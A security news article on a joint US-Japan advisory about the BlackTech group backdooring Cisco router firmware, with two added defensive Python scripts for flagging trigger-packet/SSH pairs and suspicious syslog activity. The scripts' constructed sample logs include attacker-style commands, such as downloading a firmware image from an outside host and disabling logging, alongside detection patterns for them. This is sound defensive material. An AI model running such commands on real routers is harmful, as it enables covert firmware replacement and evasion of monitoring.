Cybersecurity agencies from Japan and the U.S. have warned of attacks mounted by a state-backed hacking group from China to stealthily tamper with branch routers and use them as jumping-off points to access the networks of various companies in the two countries.
The attacks have been tied to a malicious cyber actor dubbed BlackTech by the U.S. National Security Agency (NSA), Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Japan National Police Agency (NPA), and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC).
"BlackTech has demonstrated capabilities in modifying router firmware without detection and exploiting routers' domain-trust relationships to pivot from international subsidiaries to headquarters in Japan and the United States, which are the primary targets," the agencies said in a joint alert.
Targeted sectors include government, industrial, technology, media, electronics, and telecommunications, as well as entities that support the militaries of the U.S. and Japan.
BlackTech, also tracked as Circuit Panda, HUAPI, Manga Taurus, Palmerworm, Red Djinn, and Temp.Overboard, has a history of operating against targets in East Asia, specifically Taiwan, Japan, and Hong Kong, since at least 2007.
Trend Micro, in December 2015, described the threat actor as well-funded and organized, striking key industry verticals – namely government, consumer electronics, computer, healthcare, and finance – located in the region.
A wide range of backdoors has since been attributed to the group, including BendyBear, BIFROSE (aka Bifrost), Consock, KIVARS, PLEAD, TSCookie (aka FakeDead), XBOW, and Waterbear (aka DBGPRINT). PLEAD campaigns documented by Trend Micro in June 2017 involved the exploitation of vulnerable routers for use as command-and-control (C&C) servers.
"PLEAD actors use a router scanner tool to scan for vulnerable routers, after which the attackers will enable the router's VPN feature then register a machine as virtual server," Trend Micro noted at the time. "This virtual server will be used either as a C&C server or an HTTP server that delivers PLEAD malware to their targets."
Image source: PwC
Typical attack chains orchestrated by the threat actor involve spear-phishing emails with backdoor-laden attachments that deploy malware designed to harvest sensitive data, including a downloader called Flagpro and a backdoor known as BTSDoor, PwC disclosed in October 2021, noting that "router exploitation is a core part of TTPs for BlackTech."
Earlier this July, Google-owned Mandiant highlighted Chinese threat groups' "targeting of routers and other methods to relay and disguise attacker traffic both outside and inside victim networks."
The threat intelligence company further linked BlackTech to a malware named EYEWELL that's primarily delivered to Taiwanese government and technology targets and which "contains a passive proxy capability that can be used to relay traffic from other systems infected with EYEWELL within a victim environment."
The extensive toolset points to a well-resourced crew that continually evolves its malware and exploitation tradecraft to sidestep detection and stay under the radar for lengthy periods, including by abusing stolen code-signing certificates and living-off-the-land (LotL) techniques.
In its latest advisory, CISA and the other agencies called out the threat actor for its ability to develop customized malware and tailored persistence mechanisms for infiltrating edge devices, often modifying firmware to maintain persistence, proxy traffic, blend in with corporate network traffic, and pivot to other victims on the same network.
Specifically, the modified firmware includes a built-in SSH backdoor that lets the operators maintain covert access to the router, with "magic packets" used to switch the function on and off.
"BlackTech actors have compromised several Cisco routers using variations of a customized firmware backdoor," the agencies said. "The backdoor functionality is enabled and disabled through specially crafted TCP or UDP packets. This TTP is not solely limited to Cisco routers, and similar techniques could be used to enable backdoors in other network equipment."
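A backdoor that is switched on by a specially crafted packet and then used over SSH leaves a recognisable shape in flow data: a lone packet to the router on a port it does not normally serve, followed shortly afterwards by an SSH session from the same source. The script below is an added example written for this article, not tooling from the agencies or from Cisco; the router address, the management subnet, the expected service list, the 60-second window, and the flow records are all constructed assumptions, and the pairing heuristic is a hypothesis to tune against your own traffic, not a signature published in the advisory.

```python
import ipaddress
from dataclasses import dataclass
from datetime import datetime, timedelta

# Hypothetical environment: the router's management address, the subnet
# administrators are expected to connect from, and the (proto, port) pairs
# the router legitimately answers on.
ROUTER_IP = ipaddress.ip_address("192.0.2.1")
MGMT_NET = ipaddress.ip_network("10.0.0.0/24")
EXPECTED_SERVICES = {("tcp", 22), ("udp", 161), ("tcp", 179), ("udp", 123)}


@dataclass
class Flow:
    """One aggregated flow record in the style of NetFlow/IPFIX exports."""
    ts: datetime
    src: str
    dst: str
    proto: str   # "tcp" or "udp"
    dport: int
    packets: int


def _t(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed sample flows for the example; not captured traffic.
FLOWS = [
    Flow(_t("2023-09-27 10:00:00"), "10.0.0.5", "192.0.2.1", "tcp", 22, 40),       # admin SSH from mgmt net
    Flow(_t("2023-09-27 11:13:50"), "203.0.113.77", "192.0.2.1", "udp", 50123, 1),  # lone packet to an odd port
    Flow(_t("2023-09-27 11:14:05"), "203.0.113.77", "192.0.2.1", "tcp", 22, 35),    # SSH from outside mgmt net
    Flow(_t("2023-09-27 11:30:00"), "10.0.0.9", "192.0.2.1", "udp", 161, 1),        # routine SNMP poll
    Flow(_t("2023-09-27 12:00:00"), "203.0.113.77", "192.0.2.50", "tcp", 22, 12),   # not aimed at the router
]


def to_router(f: Flow) -> bool:
    return ipaddress.ip_address(f.dst) == ROUTER_IP


def from_mgmt(f: Flow) -> bool:
    return ipaddress.ip_address(f.src) in MGMT_NET


def unexpected_ssh(flows):
    """SSH sessions to the router that did not originate from the management subnet."""
    return [f for f in flows
            if to_router(f) and f.proto == "tcp" and f.dport == 22 and not from_mgmt(f)]


def trigger_candidates(flows):
    """Single-packet flows to the router on ports it is not expected to serve.
    A backdoor toggled by a crafted TCP or UDP packet would look like this."""
    return [f for f in flows
            if to_router(f) and f.packets == 1 and (f.proto, f.dport) not in EXPECTED_SERVICES]


def correlate(flows, window_s: int = 60):
    """Pair each trigger candidate with an unexpected SSH session from the same
    source that begins within window_s seconds after it."""
    hits = []
    ssh = unexpected_ssh(flows)
    for cand in trigger_candidates(flows):
        for s in ssh:
            gap = s.ts - cand.ts
            if s.src == cand.src and timedelta(0) <= gap <= timedelta(seconds=window_s):
                hits.append((cand, s))
    return hits


if __name__ == "__main__":
    for cand, s in correlate(FLOWS):
        print(f"{cand.src}: {cand.proto}/{cand.dport} at {cand.ts:%H:%M:%S}, "
              f"then SSH at {s.ts:%H:%M:%S}")
```

On the constructed data the only pairing is the UDP packet to port 50123 followed fifteen seconds later by SSH from 203.0.113.77; the SNMP poll is a single packet too, but to an expected service, so it is not a candidate. Each of the three checks is also useful on its own: an SSH session from outside the management subnet is worth a look regardless of whether a trigger packet preceded it.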
Cisco, in its own bulletin, said the most prevalent initial access vector in these attacks concerns stolen or weak administrative credentials and that there is no evidence of active exploitation of any security flaws in its software.
"Certain configuration changes, such as disabling logging and downloading firmware, require administrative credentials," the company said. "Attackers used compromised credentials to perform administrative-level configuration and software changes."
As mitigations, network defenders are advised to monitor network devices for unauthorized downloads of bootloaders and firmware images and for unexpected reboots, and to watch for anomalous traffic destined to the router, including SSH.
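The log side of that advice can be turned into a small set of rules: an image copied onto flash, a change to the boot variable, logging being switched off, a reload, and an administrative login from a source that is not a management host. The script below is an added example for this article, not code from the agencies or from Cisco. The sample lines are constructed and modelled on IOS syslog formats (LOGIN_SUCCESS, the CFGLOG_LOGGEDCMD records emitted when configuration change logging is enabled, and SYS-5-RELOAD); the management subnet and the rule set are assumptions to adapt to your own devices.

```python
import ipaddress
import re

# Hypothetical: the only subnet administrators are expected to log in from.
MGMT_NETS = [ipaddress.ip_network("10.0.0.0/24")]

# Constructed sample syslog lines modelled on IOS message formats; not real captures.
SAMPLE_LOGS = """\
Sep 27 10:01:02 edge-rtr-1 %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: admin] [Source: 10.0.0.5] [localport: 22] at 10:01:02 UTC Wed Sep 27 2023
Sep 27 10:01:40 edge-rtr-1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:show version
Sep 27 11:14:07 edge-rtr-1 %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: admin] [Source: 203.0.113.77] [localport: 22] at 11:14:07 UTC Wed Sep 27 2023
Sep 27 11:14:30 edge-rtr-1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:no logging host 10.0.0.9
Sep 27 11:15:02 edge-rtr-1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:copy tftp://203.0.113.77/image.bin flash:
Sep 27 11:20:55 edge-rtr-1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:boot system flash:image.bin
Sep 27 11:21:10 edge-rtr-1 %SYS-5-RELOAD: Reload requested by admin on vty0 (203.0.113.77). Reload Reason: Reload Command.
"""

# Each rule is (tag, pattern); a line may match more than one.
RULES = [
    ("firmware_download", re.compile(r"logged command:copy \S+ (?:flash|bootflash|disk\d*):", re.I)),
    ("boot_change", re.compile(r"logged command:(?:no )?boot system\b", re.I)),
    ("logging_disabled", re.compile(r"logged command:no (?:logging|archive|service timestamps)\b", re.I)),
    ("reload", re.compile(r"%SYS-5-RELOAD:")),
]
LOGIN_RE = re.compile(r"LOGIN_SUCCESS: Login Success \[user: (\S+)\] \[Source: ([\d.]+)\]")


def from_mgmt(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in MGMT_NETS)


def analyze(log_text: str):
    """Return (tag, line) findings for every line that trips a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m and not from_mgmt(m.group(2)):
            findings.append(("login_from_unexpected_source", line))
        for tag, rx in RULES:
            if rx.search(line):
                findings.append((tag, line))
    return findings


def assess(findings):
    """Escalate when an image was written or the boot variable changed and the
    device then reloaded: from the log side, that is what a firmware swap looks like."""
    tags = {t for t, _ in findings}
    if ("firmware_download" in tags or "boot_change" in tags) and "reload" in tags:
        return "high: possible firmware replacement"
    if tags:
        return "medium: suspicious administrative activity"
    return "none"


if __name__ == "__main__":
    result = analyze(SAMPLE_LOGS)
    for tag, line in result:
        print(f"[{tag}] {line}")
    print(assess(result))
```

These rules only fire if the device is still sending logs, which is exactly why "no logging" is one of them: an attacker with administrative credentials can silence the device first, so the collector should also alert when a router that normally logs goes quiet. Comparing the running image against a vendor-published hash after any unexpected reload closes the loop on the high-severity case.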